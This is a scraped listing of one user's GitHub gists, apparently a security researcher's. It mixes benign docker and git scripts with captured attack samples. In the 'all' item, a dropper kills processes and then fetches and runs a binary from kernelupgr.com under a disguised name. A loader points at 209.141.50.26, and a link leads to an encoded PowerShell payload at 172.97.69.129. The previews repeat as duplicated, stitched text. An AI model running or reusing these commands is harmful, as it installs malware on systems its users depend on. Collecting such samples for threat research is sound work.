Remco Verhoef nl5887

## start.sh
export DATADIR=$(pwd)/tkiv-data/

for s in "pd1 pd2 pd3 tikv1 tikv2 tikv3"; do
    docker stop $s
    docker rm $s
done

#ifconfig lo0 alias 192.168.1.101
#ifconfig lo0 alias 192.168.1.102
#ifconfig lo0 alias 192.168.1.103

## precommit
#!/bin/bash
set -e

DEST=$(mktemp -d)
SRC=$(pwd)

pushd .
cd $DEST; git clone  $SRC/.git . >/dev/null 2>&1

cd $SRC; git diff -P --cached | patch -p1 -d $DEST >/dev/null

## dockerize.sh
#!/bin/bash

DEST=$(mktemp -d)
SRC=$(pwd)

echo "Cloning $SRC into $DEST"

pushd .
cd $DEST
git clone $SRC/.git .

## gist:0a55e297aad9bf5f4882deb44ea0ef79
function greynoise
     if test (count $argv) -eq 0
         echo "No arguments specified. Usage:\necho greynoise {ip}"
         return 1
     end

     set ip $argv[1]

     curl -s -XPOST -d "ip=$ip" 'http://api.greynoise.io:8888/v1/query/ip'|jq '.'
end

## 001_readme.md

      
              3 files
            
          
              1 fork
            
          
              0 comments
            
          
              8 stars
            
          
                nl5887
                / 001_readme.md
            
            
              Last active
              July 10, 2022 02:44
            
              
                Metasploit Meterpreter handler servers (HTTP/HTTPS) 
              
          
    This gist contains a list of verified Metasploit Meterpreter http(s) handlers and Powershell Empire http(s) listeners.
Servers could be malicious, or just part of a red teaming action.
Thanks to censys.io and Jose.

  
## 000_readme.md

      
              4 files
            
          
              0 forks
            
          
              0 comments
            
          
              1 star
            
          
                nl5887
                / 000_readme.md
            
            
              Created
              March 7, 2019 19:21
            
          
    http://172.97.69.129/1.ps1
[step 1](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)Decode_text('UTF16LE%20(1200)')&amp;input=SmdBb0FGc0Fjd0JqQUhJQWFRQndBSFFBWWdCc0FHOEFZd0JyQUYwQU9nQTZBR01BY2dCbEFHRUFkQUJsQUNnQUtBQk9BR1VBZHdBdEFFOEFZZ0JxQUdVQVl3QjBBQ0FBU1FCUEFDNEFVd0IwQUhJQVpRQmhBRzBBVWdCbEFHRUFaQUJsQUhJQUtBQk9BR1VBZHdBdEFFOEFZZ0JxQUdVQVl3QjBBQ0FBU1FCUEFDNEFRd0J2QUcwQWNBQnlBR1VBY3dCekFHa0Fid0J1QUM0QVJ3QjZBR2tBY0FCVEFIUUFjZ0JsQUdFQWJRQW9BQ2dBVGdCbEFIY0FMUUJQQUdJQWFnQmxBR01BZEFBZ0FFa0FUd0F1QUUwQVpRQnRBRzhBY2dCNUFGTUFkQUJ5QUdVQVlRQnRBQ2dBTEFCYkFFTUFid0J1QUhZQVpRQnlBSFFBWFFBNkFEb0FSZ0J5QUc4QWJRQkNBR0VBY3dCbEFEWUFOQUJUQUhRQWNnQnBBRzRBWndBb0FDY0FTQUEwQUhNQVNRQkJBRThBYVFCMEFGVUFSZ0J6QUVNQVFRQTNBRllBVndCaEFEUUFMd0JoQUZJQWFBQm1BQ3NBYmdCRkFHb0FOUUJFQURFQVlRQkdBR2dBUmdCRkFFb0FXUUJEQURZQU53QXlBRlVBYVFCV0FHRUFad0JOQURJQVNnQndBR2tBWWdBNEFGSUFhZ0JaQUhJQWNRQnlBRUlBU0FCMEFITUFSQUEwQURnQWRnQmhBSGNBTndCWUFIUUFaZ0FyQURnQWVBQnNBRElBVXdCeUFHSUFUZ0J5QUdzQWJBQldBRFFBVEFCcEFDOEFSd0JqQUhrQU5RQjZBSG9BYmdCSEFH

  
## 00_readme.md

      
              3 files
            
          
              0 forks
            
          
              0 comments
            
          
              6 stars
            
          
                nl5887
                / 00_readme.md
            
            
              Last active
              November 19, 2021 23:24
            
              
                Ghidra decompile 
              
          
    Ghydra decompiler

This python script communicates with the Ghydra decompiler. Currently it succeeds in communicating, sending hardcoded opcodes and returning decompiled code.
Currently working on reversing the getPcodePacked command.
Next steps:

implement exception handling
implement callbacks
allow decompilation of custom payloads


## all
ps aux |awk '$3>40.0{print $2}'|xargs kill -9
cd /tmp
if [ $? -ne 0 ]
then
export PATH=`pwd`:$PATH
else
export PATH=/tmp:$PATH
fi
wget -q v.kernelupgr.com/d/vv -O \[bioset\] || curl -s v.kernelupgr.com/d/vv -o \[bioset\]
chmod +x \[bioset\]

## a
#!/bin/sh

# Edit
WEBSERVER="209.141.50.26"
# Stop editing now


BINARIES="arm arm7 arm64"

for Binary in $BINARIES; do

## gist:e7b044f7d264dba7d88daed49a3c084e
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2017 Matt Martz
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
	export DATADIR=$(pwd)/tkiv-data/

	for s in "pd1 pd2 pd3 tikv1 tikv2 tikv3"; do
	docker stop $s
	docker rm $s
	done

	#ifconfig lo0 alias 192.168.1.101
	#ifconfig lo0 alias 192.168.1.102
	#ifconfig lo0 alias 192.168.1.103
	#!/bin/bash
	set -e

	DEST=$(mktemp -d)
	SRC=$(pwd)

	pushd .
	cd $DEST; git clone $SRC/.git . >/dev/null 2>&1

	cd $SRC; git diff -P --cached \| patch -p1 -d $DEST >/dev/null
	function greynoise
	if test (count $argv) -eq 0
	echo "No arguments specified. Usage:\necho greynoise {ip}"
	return 1
	end

	set ip $argv[1]

	curl -s -XPOST -d "ip=$ip" 'http://api.greynoise.io:8888/v1/query/ip'\|jq '.'
	end
	ps aux \|awk '$3>40.0{print $2}'\|xargs kill -9
	cd /tmp
	if [ $? -ne 0 ]
	then
	export PATH=`pwd`:$PATH
	else
	export PATH=/tmp:$PATH
	fi
	wget -q v.kernelupgr.com/d/vv -O \[bioset\] \|\| curl -s v.kernelupgr.com/d/vv -o \[bioset\]
	chmod +x \[bioset\]
	#!/bin/sh

	# Edit
	WEBSERVER="209.141.50.26"
	# Stop editing now


	BINARIES="arm arm7 arm64"

	for Binary in $BINARIES; do
	#!/usr/bin/env python
	# -- coding: utf-8 --
	# Copyright 2012-2017 Matt Martz
	# All Rights Reserved.
	#
	# Licensed under the Apache License, Version 2.0 (the "License"); you may
	# not use this file except in compliance with the License. You may obtain
	# a copy of the License at
	#
	# http://www.apache.org/licenses/LICENSE-2.0